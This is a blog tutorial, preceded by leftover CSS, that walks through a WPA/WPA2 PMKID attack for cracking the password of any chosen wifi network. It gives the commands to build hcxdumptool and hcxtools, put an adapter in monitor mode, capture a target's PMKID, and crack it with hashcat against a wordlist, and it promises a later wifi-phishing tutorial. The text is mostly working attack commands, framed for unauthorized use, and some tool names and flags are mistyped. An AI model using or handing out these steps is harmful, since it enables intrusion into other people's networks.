/* maujanjaTanzania*/ .TDheading-1{background-image:linear-gradient(to right,#eb3941,#f15e64,#e14e53,#e2373f);box-shadow:0 5px 15px rgba(242,97,103,.4);Color:white;padding:10px;border-radius:7px} .TDheading-2{background-image:linear-gradient(to right,#25aae1,#40e495,#30dd8a,#2bb673);box-shadow:0 4px 15px 0 rgba(49,196,190,0.75);Color:white;padding:10px;border-radius:7px} .TDheading-3{background-image:linear-gradient(to right,#f5ce62,#e43603,#fa7199,#e85a19);box-shadow:0 4px 15px 0 rgba(229,66,10,0.75);Color:white;padding:10px;border-radius:7px} .TDheading-4{background-image:linear-gradient(to right,#667eea,#764ba2,#6B8DD6,#8E37D7);box-shadow:0 4px 15px 0 rgba(116,79,168,0.75);Color:white;padding:10px;border-radius:7px} .TDheading-5{background-image:linear-gradient(to right,#fc6076,#ff9a44,#ef9d43,#e75516);box-shadow:0 4px 15px 0 rgba(252,104,110,0.75);Color:white;padding:10px;border-radius:7px} .TDheading-6{background-image:linear-gradient(to right,#0ba360,#3cba92,#30dd8a,#2bb673);box-shadow:0 4px 15px 0 rgba(23,168,108,0.75);Color:white;padding:10px;border-radius:7px} .TDheading-7{background-image:linear-gradient(to right,#009245,#FCEE21,#00A8C5,#D9E021);box-shadow:0 4px 15px 0 rgba(83,176,57,0.75);Color:white;padding:10px;border-radius:7px} .TDheading-8{background-image:linear-gradient(to right,#6253e1,#852D91,#A3A1FF,#F24645);box-shadow:0 4px 15px 0 rgba(126,52,161,0.75);Color:white;padding:10px;border-radius:7px} .TDheading-9{background-image:linear-gradient(to right,#29323c,#485563,#2b5876,#4e4376);box-shadow:0 4px 15px 0 rgba(45,54,65,0.75);Color:white;padding:10px;border-radius:7px} .TDheading-10{background-image:linear-gradient(to right,#25aae1,#4481eb,#04befe,#3f86ed);box-shadow:0 4px 15px 0 rgba(65,132,234,0.75);Color:white;padding:10px;border-radius:7px} .TDheading-11{background-image:linear-gradient(to right,#ed6ea0,#ec8c69,#f7186a,#FBB03B);box-shadow:0 4px 15px 0 rgba(236,116,149,0.75);Color:white;padding:10px;border-radius:7px}

Pages

HOW TO HACK WIFI PASSWORD (WPA / WPA2) USING PMKID ATTACK

 
You need to have;
1. Wifi adapter with Monitor mode and Packet Injection

2. High capacity computer

3. Kali linux

STEPS TO FOLLOW

1. The first step
download and install hcxdumptool and hcxtool for these kurun commands (this is for root user)

cd; git clone https://github.com/ZerBea/hcxdumptool; git clone https://github.com/ZerBea/hcxtools; cd hcxdumptool; make; make install; cd; cd hcxtools; make; make install; cd

2. The second step:
Put your wifi adapter in monitor mode by kurun this command

airmon-ng start wlanX

WlanX is the name of your wifi interface, knowing the name of the ifconfig interface run command. After you put it in monitor mode the interface of your wifi will change to something like wlanXmon


3.capture the PMKID of the wifi you want for this kurun command

echo BSSID> targetBSSID

In BSSID you will change and type the BSSID wifi you want to hack. Get a list of BSSID run airdump-ng wlanXmon .Then enter this command


hcxdumptool -i wlanXmon -o output
--enable_status = 1 --filterlist_ap = targetBSSID --filtermode = 2

Change wlanXmon by setting your wifi interface name in monitor mode.
It will take several minutes to capture PMKID

4. Step 4; convert Hash into a format that will be understood by hashcat by using this command

hcxcaptool -z hashoutput.txt output

5. Step 5; Crack hashes using hashcat for this command

hashcat -m 16800 hashoutput.txt -a 0 --kernel-accel = 1 -w 4 --force 'topwifipass.txt'


we have used the wordlist of topwifipass.txt you can customize and use the wordlist you want according to your needs. Wait for it to finish cracking and you will finally get the cracked password

In the next tutorial we will show you how to hack wifi password using wifi phishing attack
. + 255785078502

Subscribe your email address now to get the latest articles from us

No comments:

 
Copyright © 2015. DJMSAFITZ MUSIC.
Design by Herdiansyah Hamzah. Published by Themes Paper. Powered by Blogger.
Creative Commons License